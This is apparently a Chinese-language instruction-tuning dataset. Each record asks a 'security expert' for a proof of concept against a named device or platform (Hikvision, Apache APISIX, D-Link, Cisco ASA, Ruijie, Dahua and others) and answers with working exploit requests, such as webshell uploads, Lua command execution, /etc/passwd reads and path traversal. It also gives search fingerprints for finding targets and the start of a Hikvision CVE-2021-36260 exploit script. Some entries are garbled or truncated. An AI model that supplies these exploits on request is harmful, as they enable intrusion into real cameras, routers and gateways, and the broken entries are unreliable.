  323. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传漏洞\n漏洞描述:HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器\n影响版本:HIKVISION iVMS-8700综合安防管理平台\n网络测绘:``` icon_hash=\"-911494769\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. icon_hash=\"-911494769\"\n2. POST /eps/resourceOperations/upload.action HTTP/1.1\nHost: \nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: MicroMessenger\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj\nContent-Length: 212\n\n------WebKitFormBoundaryTJyhtTNqdMNLZLhj\nContent-Disposition: form-data; name=\"fileUploader\";filename=\"test.jsp\"\nContent-Type: image/jpeg\n\n<%out.print(\"hello\");%>\n------WebKitFormBoundaryTJyhtTNqdMNLZLhj--\n3. /eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传漏洞.md"}
    324. 

  324. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache APISIX 默认密钥漏洞 CVE-2020-13945\n漏洞描述:Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。 参考链接: - https://apisix.apache.org/docs/apisix/getting-started - https://github.com/apache/apisix/pull/2244 - https://seclists.org/oss-sec/2020/q4/187\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-13945\n【POC利用方法】\n1. docker-compose up -d\n2. POST /apisix/admin/routes HTTP/1.1\nHost: your-ip:9080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\nContent-Length: 406\n\n{\n    \"uri\": \"/attack\",\n\"script\": \"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n    \"upstream\": {\n        \"type\": \"roundrobin\",\n        \"nodes\": {\n            \"example.com:80\": 1\n        }\n    }\n}\n3. http://your-ip:9080/attack?cmd=id\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Apache APISIX 默认密钥漏洞 CVE-2020-13945.md"}
    325. 

  325. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250\n漏洞描述:近日D-Link发布公告[1]称旗下产品DAP-2020存在任意文件读取漏洞,CVE编号为CVE-2021-27250,目前已在硬件版本:A1,固件版本:1.01 上测试了PoC,由于漏洞影响核心组件,因此其他版本也可能受到此漏洞的影响\n影响版本:``` D-LINK DAP-2020 ```\n网络测绘:``` body=\"DAP-1360\" && body=\"6.05\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-27250\n【POC利用方法】\n1. D-LINK DAP-2020\n2. body=\"DAP-1360\" && body=\"6.05\"\n3. POST /cgi-bin/webproc\n\ngetpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250.md"}
    326. 

  326. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cisco ASA设备任意文件删除漏洞 CVE-2020-3187\n漏洞描述:Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞,该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。\n影响版本:- Cisco ASA设备: ![](./images/202202162118289.png) - Cisco FTD设备: ![](./images/202202162119368.png)\n网络测绘:``` /+CSCOE+/ Cisco-ASA ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-3187\n【POC利用方法】\n1. /+CSCOE+/\nCisco-ASA\n2. curl -H \"Cookie: token=../+CSCOU+/csco_logo.gif\" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html\n3. curl -H \"Cookie: token=../+CSCOU+/csco_logo.gif\" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Cisco ASA设备任意文件删除漏洞 CVE-2020-3187.md"}
    327. 

  327. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞\n漏洞描述:大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件\n影响版本:大华城市安防监控系统平台管理\n网络测绘:``` \"attachment_downloadByUrlAtt.action\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"attachment_downloadByUrlAtt.action\"\n2. /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞.md"}
    328. 

  328. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:飞鱼星 家用智能路由 cookie.cgi 权限绕过\n漏洞描述:飞鱼星 家用智能路由存在权限绕过,通过Drop特定的请求包访问未授权的管理员页面\n影响版本:``` 飞鱼星 家用智能路由 飞鱼星 企业级智能上网行为管理系统 ```\n网络测绘:``` title=\"飞鱼星家用智能路由\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 飞鱼星 家用智能路由\n飞鱼星 企业级智能上网行为管理系统\n2. title=\"飞鱼星家用智能路由\"\n3. http://xxx.xxx.xxx.xxx/index.html\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/飞鱼星 家用智能路由 cookie.cgi 权限绕过.md"}
    329. 

  329. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Panabit iXCache date_config 后台命令执行漏洞\n漏洞描述:Panabit iXCache date_config模块存在命令拼接,导致可执行任意命令\n影响版本:``` Panabit iXCache ```\n网络测绘:``` title=\"iXCache\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Panabit iXCache\n2. title=\"iXCache\"\n3. /cgi-bin/Maintain/date_config\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Panabit iXCache date_config 后台命令执行漏洞.md"}
    330. 

  330. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:rConfig ajaxEditTemplate.php 后台远程命令执行漏洞\n漏洞描述:rConfig ajaxEditTemplate.php 存在后台远程命令执行\n影响版本:``` rConfig ```\n网络测绘:``` app=\"rConfig\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"rConfig\"\n2. <?php\nrequire_once(\"/home/rconfig/classes/usersession.class.php\");\nrequire_once(\"/home/rconfig/classes/ADLog.class.php\");\nrequire_once(\"/home/rconfig/classes/spyc.class.php\");\nrequire_once(\"/home/rconfig/config/functions.inc.php\");\n\n$log = ADLog::getInstance();\nif (!$session->logged_in) {\n    echo 'Don\\'t bother trying to hack me!!!!!<br /> This hack attempt has been logged';\n    $log->Warn(\"Security Issue: Some tried to access this file directly from IP: \" . $_SERVER['REMOTE_ADDR'] . \" & Username: \" . $session->username . \" (File: \" . $_SERVER['PHP_SELF'] . \")\");\n    // need to add authentication to this script\n    header(\"Location: \" . $config_basedir . \"login.php\");\n} else {\n    $ymlData = Spyc::YAMLLoad($_POST['code']);\n    $fileName = $_POST['fileName'];\n    $check_yml_extension = explode('.', $fileName);\n    if(@!array_key_exists($check_yml_extension[1])){\n        if(@$check_yml_extension[1] != 'yml'){\n            $fileName = $fileName . '.yml';\n        }\n    }\n    $fullpath = $config_templates_basedir.$fileName;\n\n    $username = $_SESSION['username'];\n    require_once(\"../../../classes/db2.class.php\");\n    require_once(\"../../../classes/ADLog.class.php\");\n    $db2 = new db2();\n    $log = ADLog::getInstance();\n\n    if (!is_dir('templates')) {\n        mkdir('templates');\n        chown('templates', 'apache');\n    }\n\n    // if'' to create the filename based on the command if not created & chmod to 666\n    if (!file_exists($fullpath)) {\n        exec(\"touch \" . $fullpath);\n        chmod($fullpath, 0666);\n    }\n    // if the file is alread in place chmod it to 666 before writing info\n    chmod($fullpath, 0666);\n\n    // dump array into file & chmod back to RO\n    $filehandle = fopen($fullpath, 'w+');\n    file_put_contents($fullpath, $_POST['code']);\n    fclose($filehandle);\n    chmod($fullpath, 0444);\n \n    $db2->query(\"UPDATE `templates` SET `fileName` = :fileName, `name` = :name, `desc` = :desc, `dateLastEdit` = NOW(), `addedby` = :username WHERE `id` = :id\");\n    $db2->bind(':id', $_POST['id']);\n    $db2->bind(':fileName', $fullpath);\n    $db2->bind(':name', $ymlData['main']['name']);\n    $db2->bind(':desc', $ymlData['main']['desc']);\n    $db2->bind(':username', $username);\n\n    $queryResult = $db2->execute();\n    /* Update successful */\n    if ($queryResult && file_exists($fullpath)) {\n        $response = \"success\";\n        $log->Info(\"Success: Template: \".$fullpath.\" edited in templates folder\");\n    }\n    /* Update failed */ else {\n        $response = \"failed\";\n        $log->Warn(\"Success: Could not edit Template \".$fullpath.\" in templates folder\");\n    }\n    echo json_encode($response);    \n}  // end session check\n3. // if'' to create the filename based on the command if not created & chmod to 666\n    if (!file_exists($fullpath)) {\n        exec(\"touch \" . $fullpath);\n        chmod($fullpath, 0666);\n    }\n    // if the file is alread in place chmod it to 666 before writing info\n    chmod($fullpath, 0666);\n\n    // dump array into file & chmod back to RO\n    $filehandle = fopen($fullpath, 'w+');\n    file_put_contents($fullpath, $_POST['code']);\n    fclose($filehandle);\n    chmod($fullpath, 0444;\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/rConfig ajaxEditTemplate.php 后台远程命令执行漏洞.md"}
    331. 

  331. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞\n漏洞描述:KONE 通力电梯 app_show_log_lines.php文件过滤不足导致任意文件读取漏洞\n影响版本:``` KONE 通力电梯管理系统 ```\n网络测绘:``` \"KONE Configuration management\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. KONE 通力电梯管理系统\n2. \"KONE Configuration management\"\n3. fileselection=/etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞.md"}
    332. 

  332. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 EG易网关 cli.php 远程命令执行漏洞\n漏洞描述:锐捷EG易网关 cli.php存在命令执行漏洞,配合 锐捷EG易网关 管理员账号密码泄露漏洞 达到RCE控制服务器\n影响版本:``` 锐捷EG易网关 ```\n网络测绘:``` app=\"Ruijie-EG易网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Ruijie-EG易网关\"\n2. <?php\n\n/**\n * cli命令查询\n */\ndefine('IN', true);     //定位该文件是入口文件\ndefine('DS', DIRECTORY_SEPARATOR);\ndefine('AROOT', dirname(__FILE__) . DS);\ninclude_once(AROOT . 'mvc' . DS . 'controller' . DS . 'core.controller.php');\n\nclass defaultController extends coreController {\n\n    function __construct() {\n// 载入默认的\n        parent::__construct();\n    }\n\n    /**\n     * cli命令执行\n     */\n    public function indexAction() {\n        $mode = p(\"mode_url\");\n        $command = p(\"command\");\n        $answer = p(\"answer\");\n\n        if ($mode == false)\n            $mode = \"exec\";\n        if ($answer == false)\n            $answer = \"\";\n        if ($command !== false)\n            $command = iconv('UTF-8', 'GBK//IGNORE', $command);\n        $data = execCli($mode, $command, $answer);\n        if ($data[\"status\"] !== 1) {\n            json_echo($data);\n            exit();\n        }\n        $res = preg_replace(array(\"/%01/\", \"/%22/\", \"/%09/\", \"/%0D/\", \"/%3A/\",\"/%07/\"), array(\"\", '\"', \"\\t\", \"\", \":\",\"\"), urlencode($data[\"data\"])); //先进行url编码防止gbk中文无法json,再过滤首尾空方块\n        $resArr = explode(\"%0A\", $res);\n        //$resArr = preg_split(\"/\\r\\n|\\n/\", $data[\"data\"]);\n        if ($mode == \"config\" && strstr($resArr[0], \"Enter+configuration+commands%2C+one+per+line.++End+with+CNTL%2FZ.\"))\n            array_shift($resArr);\n        $data[\"data\"] = $resArr;\n        if (!headers_sent()) {\n            header(\"Content-type: text/json;charset=gbk\");\n            //header(\"Expires: Thu, 01 Jan 1970 00:00:01 GMT\");\n            header(\"Cache-Control: no-cache, must-revalidate\");\n            header(\"Pragma: no-cache\");\n        }\n        echo urldecode(json_encode($data));\n        //echo json_encode($data);\n    }\n\n    /**\n     * 执行shell脚本\n     */\n    public function shellAction() {\n        $command = p(\"command\");\n        if ($command == false) {\n            $data[\"status\"] = 2;\n            $data[\"msg\"] = \"no command\";\n            json_echo($data);\n            exit();\n        }\n        $content = [];\n        exec(EscapeShellCmd($command), $content);\n        $data = array(\"status\" => true,\n            \"data\" => $content);\n        json_echo($data);\n    }\n\n    /**\n     * 获取系统时间\n     */\n    public function dateAction() {\n        setTimeZone();\n        $data['status'] = true;\n        $data[\"data\"][\"time\"] = date(\"Y-m-d H:i:s\");\n        $data[\"data\"][\"zone\"] = \"UTC\" . getTimeZone();\n        json_echo($data);\n    }\n\n    /**\n     * 获取系统时区\n     */\n    public function datezoneAction() {\n        $data['status'] = true;\n        $data[\"data\"] = getTimeZone();\n        json_echo($data);\n    }\n\n    /**\n     * 检测静态页面时候未登录直接进入\n     */\n    public function checkloginAction() {\n        json_echo(array(\"status\" => true));\n    }\n\n}\n\ninclude_once(AROOT . \"init.php\");     //mvc初始化入口,放在底部\n3. /**\n     * 执行shell脚本\n     */\n    public function shellAction() {\n        $command = p(\"command\");\n        if ($command == false) {\n            $data[\"status\"] = 2;\n            $data[\"msg\"] = \"no command\";\n            json_echo($data);\n            exit();\n        }\n        $content = [];\n        exec(EscapeShellCmd($command), $content);\n        $data = array(\"status\" => true,\n            \"data\" => $content);\n        json_echo($data);\n    }\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 EG易网关 cli.php 远程命令执行漏洞.md"}
    333. 

  333. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 EG易网关 download.php 任意文件读取漏洞\n漏洞描述:锐捷EG易网关 download.php 存在后台任意文件读取漏洞,导致可以读取服务器任意文件\n影响版本:``` 锐捷EG易网关 ```\n网络测绘:``` app=\"Ruijie-EG易网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Ruijie-EG易网关\"\n2. <?php\n/**\n * 文件下载\n */\ndefine('IN', true);     //定位该文件是入口文件\ndefine('DS', DIRECTORY_SEPARATOR);\ndefine('AROOT', dirname(__FILE__) . DS);\ninclude_once(AROOT . 'mvc' . DS . 'controller' . DS . 'core.controller.php');\n\nclass defaultController extends coreController {\n\n    /**\n     * 应许下载的文件列表,不在该列表的文件一律不能下载,列表使用正则表达式\n     * @var array\n     */\n    private $allow = array(\n        \"/^\\/data\\/.*$/\",\n        \"/^\\/mnt\\/sata0\\/webmail\\/.*$/\",\n        \"/^\\/mnt\\/sata0\\/tech.+\\.tar\\.gz$$/\",\n        \"/^\\/mnt\\/sata0\\/mail\\/.*$/\",\n        \"/^\\/mnt\\/sata0\\/audit_export\\/.*$/\",\n        \"/^\\/tmp\\/sslvpn\\/export\\/.*$/\",\n        \"/^\\/mnt\\/sata0\\/web\\/nginx\\/html\\/sslvpn_pi\\/.*$/\",\n        \"/^\\/tmp\\/.ca_web\\/.*$/\",\n        \"/^\\/mnt\\/sata0\\/sslvpn\\/.*$/\",\n        \"/^\\/tmp\\/html\\/utlog.*$/\",\n    );\n    private $error;     //错误描述\n\n    function __construct() {\n        // 载入默认的\n        parent::__construct();\n    }\n\n    /**\n     * 文件下载处理\n     */\n    public function indexAction() {\n        $filepath = v(\"file\");\n\n        $fileinfo = pathinfo($filepath);\n        $filename = iconv(\"UTF-8\", \"GB2312\", $fileinfo[\"filename\"] . (isset($fileinfo[\"extension\"]) ? \".\" . $fileinfo[\"extension\"] : \"\"));\n        //只能读取下载GB2312文件不然会有乱码\n        $filepointer = $this->_checkfile(iconv(\"UTF-8\", \"GB2312\",$filepath));\n        if ($filepointer !== false) {\n            if (headers_sent()) {\n                $this->error = \"无法下载文件,已经输出其他请求头!\";\n            } else {\n                header(\"Pragma: public\");\n                header(\"Expires: 0\");\n                header(\"Cache-Control: must-revalidate, post-check=0, pre-check=0\");\n                header(\"Cache-Control: private\", false);\n                header(\"Content-Type: {$this->_getMimeType($filename)}\");\n                header(\"Content-Disposition: attachment; filename=\\\"{$filename}\\\";\");\n                header(\"Content-Transfer-Encoding: binary\");\n                header(\"Content-Length: {$this->_getFileSize($filepointer)}\");\n\n                @ob_clean();\n\n                rewind($filepointer);\n                fpassthru($filepointer);\n                exit();\n            }\n        }\n        if ($this->error) {   //有错误产生\n            ?>\n            <!DOCTYPE html>\n            <html>\n                <head>\n                    <title>文件下载失败</title>\n                    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n                    <script type=\"text/javascript\">\n                        alert(\"<?php echo $this->error; ?>\");\n                    </script>\n                </script>\n            </head>\n            <body></body>\n            </html>\n            <?php\n        }\n    }\n\n    /**\n     * 读取文本文件内容,支持ajax请求\n     */\n    public function read_txtAction() {\n        $filename = v(\"file\");\n        if (!file_exists($filename)) {\n            $data[\"status\"] = 2;\n            $data[\"msg\"] = $filename . \"不存在\";\n            json_echo($data);\n            exit();\n        } else {\n            $fileContent = file_get_contents($filename);\n            $data = array(\"status\" => true, \"data\" => $fileContent);\n            json_echo($data);\n        }\n    }\n\n    /**\n     * 文件检查\n     */\n    private function _checkfile($filename) {\n        if ($filename == false) {\n            $this->error = \"请指定要下载的文件!\";\n            return FALSE;\n        }\n        $isallow = false;\n        foreach ($this->allow as $pattern) {\n            if (preg_match($pattern, $filename)) {\n                $isallow = true;\n                break;\n            }\n        }\n        if (!$isallow) {\n            $this->error = \"该文件不允许下载!\";\n            return FALSE;\n        }\n        if (!is_file($filename)) {\n            $this->error = \"该文件不存在!\";\n            return FALSE;\n        } else if (!is_readable($filename)) {\n            //if (system(\"chmod +r \" . escapeshellarg($filename))) {\n                $this->error = \"无法下载该文件,没有权限!\";\n                return FALSE;\n            //}\n        }\n        return fopen($filename, \"rb\");\n    }\n\n    /**\n     * 获取文件mime类型\n     * @param string $fileName 文件名\n     * @return string\n     */\n    private function _getMimeType($fileName) {\n        $charset = v(\"charset\");\n        switch (pathinfo($fileName, PATHINFO_EXTENSION)) {\n            case \"pdf\": return \"application/pdf\";\n            case \"exe\": return \"application/octet-stream\";\n            case \"zip\": return \"application/zip\";\n            case \"doc\": return \"application/msword\";\n            case \"xls\": return \"application/vnd.ms-excel\";\n            case \"ppt\": return \"application/vnd.ms-powerpoint\";\n            case \"gif\": return \"image/gif\";\n            case \"png\": return \"image/png\";\n            case \"jpeg\":\n            case \"jpg\": return \"image/jpg\";\n            case \"htm\": return \"text/html;charset=gbk\";\n            case \"html\": if(!$charset) {\n                            return \"text/html;charset=gbk\";\n                        }else {\n                            return \"text/html;charset=UTF-8\";\n                        }\n            default: return \"application/force-download\";\n        }\n    }\n\n    /**\n     * 获取文件大小\n     * @return int\n     */\n    private function _getFileSize($filePointer) {\n        $stat = fstat($filePointer);\n        return $stat['size'];\n    }\n\n}\n\ninclude_once AROOT.'init.php';    //mvc初始化入口,放在底部\n3. /**\n     * 读取文本文件内容,支持ajax请求\n     */\n    public function read_txtAction() {\n        $filename = v(\"file\");\n        if (!file_exists($filename)) {\n            $data[\"status\"] = 2;\n            $data[\"msg\"] = $filename . \"不存在\";\n            json_echo($data);\n            exit();\n        } else {\n            $fileContent = file_get_contents($filename);\n            $data = array(\"status\" => true, \"data\" => $fileContent);\n            json_echo($data);\n        }\n    }\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 EG易网关 download.php 任意文件读取漏洞.md"}
    334. 

  334. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DIR-802 命令注入漏洞 CVE-2021-29379\n漏洞描述:DIR-802中存在一个命令注入漏洞,攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。 与CVE-2020-15893相似,在固件版本v-1.00b05之前的D-Link DIR-802 A1上发现了一个问题。默认情况下,端口1900上启用了通用即插即用(UPnP)。攻击者可以通过将有效负载注入SSDP M-SEARCH发现数据包的“搜索目标”(ST)字段来执行命令注入。 参考链接: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29379 - https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/\n影响版本:``` DIR-802 hardware revision Ax before v1.00b05 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-29379\n【POC利用方法】\n1. DIR-802 hardware revision Ax before v1.00b05\n2. # coding: utf-8\nimport socket\nimport struct\nbuf = 'M-SEARCH * HTTP/1.1\\r\\nHOST:192.168.0.1:1900\\r\\nST:urn:schemas-upnp-org:service\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.connect((\"192.168.0.1\", 1900))\ns.send(buf)\ns.close()\n3. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DIR-802 命令注入漏洞 CVE-2021-29379.md"}
    335. 

  335. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ACTI 视频监控 images 任意文件读取漏洞\n漏洞描述:ACTI 视频监控 存在任意文件读取漏洞\n影响版本:``` ACTI摄像头 ```\n网络测绘:``` app=\"ACTi-视频监控\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"ACTi-视频监控\"\n2. /images/../../../../../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/ACTI 视频监控 images 任意文件读取漏洞.md"}
    336. 

  336. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION DS/IDS/IPC 等设备 远程命令执行漏洞 CVE-2021-36260\n漏洞描述:海康威视部分产品中的web模块存在一个命令注入漏洞,由于对输入参数校验不充分,攻击者可以发送带有恶意命令的报文到受影响设备,成功利用此漏洞可以导致命令执行。海康威视已发布版本修复该漏洞\n影响版本:1. 易受攻击的网络摄像机固件 | **产品类型** | **影响版本**                        | | ------------ | ----------------------------------- | | IPC_E0       | IPC_E0_CN_STD_5.4.6_180112          | | IPC_E1       | 未知                                | | IPC_E2       | IPC_E2_EN_STD_5.5.52_180620         | | IPC_E4       | 未知                                | | IPC_E6       | IPCK_E6_EN_STD_5.5.100_200226       | | IPC_E7       | IPCK_E7_EN_STD_5.5.120_200604       | | IPC_G3       | IPC_G3_EN_STD_5.5.160_210416        | | IPC_G5       | IPC_G5_EN_STD_5.5.113_210317        | | IPC_H1       | IPC_H1_EN_STD_5.4.61_181204         | | IPC_H5       | IPCP_H5_EN_STD_5.5.85_201120        | | IPC_H8       | Factory installed firmware mid 2021 | | IPC_R2       | IPC_R2_EN_STD_V5.4.81_180203        | 2. 易受攻击的 PTZ 摄像机固件 | **产品类型** | **影响版本**                  | | ------------ | ----------------------------- | | IPD_E7       | IPDEX_E7_EN_STD_5.6.30_210526 | | IPD_G3       | IPDES_G3_EN_STD_5.5.42_210106 | | IPD_H5       | IPD_H5_EN_STD_5.5.41_200911   | | IPD_H7       | IPD_H7_EN_STD_5.5.40_200721   | | IPD_H8       | IPD_H8_EN_STD_5.7.1_210619    | 3. 易受攻击的旧固件 | **产品类型** | **影响版本** | | ------------ | ------------ | | IPC_R7       | 5.4.x        | | IPD_R7       | 5.4.x        | | IPC_G0       | 5.4.x        | | IPC_H3       | 5.4.x        | | IPD_H3       | 5.4.x        | 4. OEM 固件\n网络测绘:``` \"671-1e0-587ec4a1\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-36260\n【POC利用方法】\n1. \"671-1e0-587ec4a1\"\n2. python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd \"ls\"\n3. # Exploit Title: Hikvision Web Server Build 210702 - Command Injection\n# Exploit Author: bashis\n# Vendor Homepage: https://www.hikvision.com/\n# Version: 1.0\n# CVE: CVE-2021-36260\n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n\n# All credit to Watchful_IP\n\n#!/usr/bin/env python3\n\n\"\"\"\nNote:\n1)  This code will _not_ verify if remote is Hikvision device or not.\n2)  Most of my interest in this code has been concentrated on how to\n    reliably detect vulnerable and/or exploitable devices.\n    Some devices are easy to detect, verify and exploit the vulnerability,\n    other devices may be vulnerable but not so easy to verify and exploit.\n    I think the combined verification code should have very high accuracy.\n3)  'safe check' (--check) will try write and read for verification\n    'unsafe check' (--reboot) will try reboot the device for verification\n\n[Examples]\nSafe vulnerability/verify check:\n    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check\n\nSafe and unsafe vulnerability/verify check:\n(will only use 'unsafe check' if not verified with 'safe check')\n    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot\n\nUnsafe vulnerability/verify check:\n    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot\n\nLaunch and connect to SSH shell:\n    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell\n\nExecute command:\n    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\"\n\nExecute blind command:\n    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind \"reboot\"\n\n$./CVE-2021-36260.py -h\n[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)\nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]\n                         [--reboot] [--shell] [--cmd CMD]\n                         [--cmd_blind CMD_BLIND] [--noverify]\n                         [--proto {http,https}]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --rhost RHOST         Remote Target Address (IP/FQDN)\n  --rport RPORT         Remote Target Port\n  --check               Check if vulnerable\n  --reboot              Reboot if vulnerable\n  --shell               Launch SSH shell\n  --cmd CMD             execute cmd (i.e: \"ls -l\")\n  --cmd_blind CMD_BLIND\n                        execute blind cmd (i.e: \"reboot\")\n  --noverify            Do not verify if vulnerable\n  --proto {http,https}  Protocol used\n$\n\"\"\"\n\nimport os\nimport argparse\nimport time\n\nimport requests\nfrom requests import packages\nfrom requests.packages import urllib3\nfrom requests.packages.urllib3 import exceptions\n\n\nclass Http(object):\n    def __init__(self, rhost, rport, proto, timeout=60):\n        super(Http, self).__init__()\n\n        self.rhost = rhost\n        self.rport = rport\n        self.proto = proto\n        self.timeout = timeout\n\n        self.remote = None\n        self.uri = None\n\n        \"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\"\n        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n        self.remote = requests.Session()\n\n        self._init_uri()\n\n        self.remote.headers.update({\n            'Host': f'{self.rhost}:{self.rport}',\n            'Accept': '*/*',\n            'X-Requested-With': 'XMLHttpRequest',\n            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n            'Accept-Encoding': 'gzip, deflate',\n            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',\n        })\n        \"\"\"\n        self.remote.proxies.update({\n            # 'http': 